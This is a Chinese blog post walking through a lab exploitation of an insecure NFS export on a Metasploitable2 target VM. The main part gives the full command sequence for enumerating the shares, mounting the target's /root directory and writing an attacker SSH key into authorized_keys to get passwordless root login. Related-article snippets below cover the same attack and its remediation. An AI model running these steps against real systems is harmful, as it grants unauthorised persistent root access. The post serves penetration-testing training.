Linux NFS共享目录配置漏洞实现免密登陆

最新推荐文章于 2024-05-11 12:11:25 发布
最新推荐文章于 2024-05-11 12:11:25 发布
阅读量358 收藏 3
点赞数 7
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18780551/article/details/137267096
版权

Linux NFS共享目录配置漏洞实现免密登陆

一、基础准备

环境:metasploitable2

靶机IP:192.168.211.141

输入命令rpcinfo 192.168.211.141进行探测

rpcinfo 192.168.211.141

输入showmount -e 192.168.211.141查看共享目录

showmount -e 192.168.211.141

设置一个ssh秘钥,输入完命令后按几下回车即可

ssh-keygen

输入命令挂载靶机目录,挂载位置为自己设置的文件夹

注意:文件夹需要存在,可以自己先创建一个文件夹

mkdir /mnt/nfs

mount -t nfs 192.168.211.141:/root /mnt/nfs

进入到文件夹下

cd /mnt/nfs

输入ls查看是否挂载成功

ls

输入命令将公钥复制到目标靶机固定位置

cp /root/.ssh/id_rsa.pub /mnt/nfs/.ssh/authorized_keys

ssh连接靶机,输入刚才设置的秘钥,输入完成后回车,再输入yes,再按下回车即可连接成功

ssh root@192.168.211.141

注意:记得输入yes,否则会连接失败

NAVI.electroNic
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nfs文件共享漏洞
m0_52433710的博客
12-21 5494
什么是nfs NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。 漏洞复现 攻击机:Kali 靶机:Metasploitable2 首先利用nmap对靶机 进行扫描,扫描其开放的端口: ...
NFS不安全的配置漏洞
weixin_46564680的博客
10-13 2063
NFS不安全的配置漏洞 NFS简述: 网络文件系统(英语:Network File System,缩写作 NFS)是一种分布式文件系统,力求客户端主机可以访问服务器端文件,并且其过程与访问本地存储时一样,允许网络上的用户以类似于本地存储的方式访问共享文件夹。 NFS服务的默认开放端口为2049/TCP。 漏洞检测: NFS不安全配置漏洞检测可以通过漏洞扫描工具发现 Nessus漏洞报告详情 使用NMAP检测漏洞 使用NMAP扫描发现目标开放2049端口 查看nmap自带的和NFS相关的
nfs漏洞修复(showmount -e)
kali_yao的博客
12-18 8583
注:nfs是生产不太建议用,如果要用的话不要对外;但如果真要对外用的话也可修复漏洞 1.漏洞概述 可以对目标主机进行"showmount -e"操作,此操作将泄露目标主机大量敏感信息,比如目录结构。更糟糕的是,如果访问控制不严的话,攻击者有可能直接访问到目标主机上的数据。 允许指定主机通过mount到nfs服务器上,阻止其他主机通过showmount -e方式,泄露NFS共享目录结构信息 2、先查看你nfs配置 ~]# cat /etc/exports /ceshi 172.17.0.1
4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露
c10udz的博客
10-29 4578
NFS(network file system):网络文件系统。Linux下三大文件系统之一,采用C/S架构。允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS应用中,本地NFS客户端可以透明的读写位于远端NFS服务器上的文件。NFS服务端机器:通过NFS协议将文件共享到网络上NFS客户端机器:通过网络挂载NFS共享目录到本地补充:NFS服务器主要进程1 rpc.nfsd 进程NFS 服务的主进程,主要管理客户端是否能够接入 NFS 服务器以及数据的传输。
CentOS7修复NFS文件共享时信息泄露漏洞
bai920708的博客
12-06 294
CentOS7修复NFS文件共享时信息泄露漏洞
linux系统设置NFS共享目录
06-27
linux系统设置NFS共享目录,已经测试过了,可以使用,服务端要先安装nfs服务
linux nfs共享目录搭建
12-07
在centos6.4下搭建nfs共享目录
Linux系统NFS服务器配置方法
11-10
则开启服务(默认服务下nfs没有完全开启) 命令#service nfs start #service portmap start 四、指定NFS服务器配置文件 NFS服务器配置文件保存“/etc/”目录中,文件名称是“exports”,该文件用于被
Linux NFS服务器实现磁盘配额
09-30
Linux NFS服务器实现磁盘配额 实现共享NFS磁盘限制 可用于docker容器挂载卷的大小限制 方便管理各容器大小
Linux NFS服务器安装与配置思路分析
09-15
NFS 是Network File System的缩写,即网络文件系统,可以让不同的客户端挂载使用同一个目录,作为共享存储使用,这样可以保证不同的节点客户端数据一致性,在集群架构中经常用到.这篇文章主要介绍了Linux NFS服务器...
nfs漏洞的处理:目标主机showmount -e信息泄露(CVE-1999-0554)
大新新大浩浩的博客
09-14 1031
nfs漏洞的处理:目标主机showmount -e信息泄露(CVE-1999-0554)
NFS高版本漏洞修复方法
jiayu的博客
08-14 657
由于centos8后,nfs相关的配置发送了变化,无法固定端口方式来做防火墙,由于一般导致漏洞的原因主要是由于showmount -e,所以我们这里采取的方式是nfs server端仅使用v4版本,禁止使用v3版本。但是,您还可以将 NFS 配置为只支持 NFS 版本 4.0 及更新的版本。这可最大限度地减少系统上打开的端口的数量和运行的服务,因为 NFSv4 不需要。正常情况下NFS可以使用firewalld进行规避,但是由于k8s默认底层会调用iptables,这里就不采用firewalld方式了。
Connect-The-Dots靶场
qq_56414082的博客
08-24 305
从而,在实际进行特权操作时,如果euid不是root,便会检查是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。访问http://192.168.16.161/mysite/bootstrap.min.cs,发现进行了加密。可以http://192.168.16.161/mysite/register.html,打开登录页面。访问刚刚目录扫描结果,在http://192.168.16.161/mysite/查看源代码,看到跳转到了几个文件",在刚刚路径中可以访问。
共享服务】nfs常见问题处理
Luxf0的博客
06-01 5721
本文主要介绍nfs服务使用过程中,常见问题及解决方法
Linux NFS共享目录配置漏洞
最新发布
m0_62670778的博客
05-11 345
使用nmap扫描靶机的IP地址,可以看到靶机的2049端口开放,且使用了nfs服务。尝试查看靶机利用NFS共享的全部文件夹:看到结果是。接下来可以利用nfs漏洞实现远程ssh无密码登录。传输成功之后再次尝试使用ssh命令连接靶机。这表示将根目录下单全部文件都共享了。,其目的就是映射共享文件夹下的根目录。将靶机上的共享文件挂载到该文件上面。在攻击机上面创建一个根文件夹。命令查看所有的本地磁盘的信息。我们尝试用ssh服务连接上靶机。在挂载成功之后我们可以通过。
漏洞验证】NFS 共享信息泄露漏洞
热门推荐
weixin_43486390的博客
01-15 1万+
文章目录描述验证 描述 漏洞名称:NFS Exported Share Information Disclosure 中文名称:NFS 共享信息泄露漏洞 漏洞等级:高危 CVE:CVE-1999-0170 Nessus扫描结果: 输出共享目录和文件信息: 验证 步骤1:msf 验证漏洞是否存在,并输出共享目录 use auxiliary/scanner/nfs/nfsmount set rho...
CVE-2022-26937 Windows NFS 栈溢出漏洞分析
顶峰
01-31 535
运维
NFS 导出的共享信息披露漏洞问题解法
diaya的专栏
01-18 2243
NFS 导出的共享信息披露漏洞
Linux nfs共享目录挂载
07-28
你可以使用以下步骤将Linux上的NFS共享目录挂载到本地: 1. 首先,确保你已经安装了NFS客户端软件。在大多数Linux发行版中,你可以使用以下命令来安装: ``` sudo apt-get install nfs-common # Ubuntu/Debian sudo yum install nfs-utils # CentOS/RHEL ``` 2. 创建一个本地目录,用于挂载NFS共享目录。例如,创建一个名为`/mnt/nfs`的目录: ``` sudo mkdir -p /mnt/nfs ``` 3. 使用`mount`命令来挂载NFS共享目录。以下是基本的挂载命令格式: ``` sudo mount -t nfs <NFS服务器IP地址或主机名>:<共享目录路径> <本地挂载路径> ``` 例如,如果NFS服务器的IP地址是`192.168.1.100`,共享目录路径是`/data`,你可以运行以下命令来挂载: ``` sudo mount -t nfs 192.168.1.100:/data /mnt/nfs ``` 4. 挂载完成后,你可以通过在`/mnt/nfs`目录下查看文件来访问NFS共享目录的内容: ``` ls /mnt/nfs ``` 请注意,如果你想在每次启动时自动挂载NFS共享目录,你可以将相应的挂载命令添加到`/etc/fstab`文件中。这样,在系统启动时,会自动执行挂载操作。 希望这些步骤能帮助你成功挂载NFS共享目录!如有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值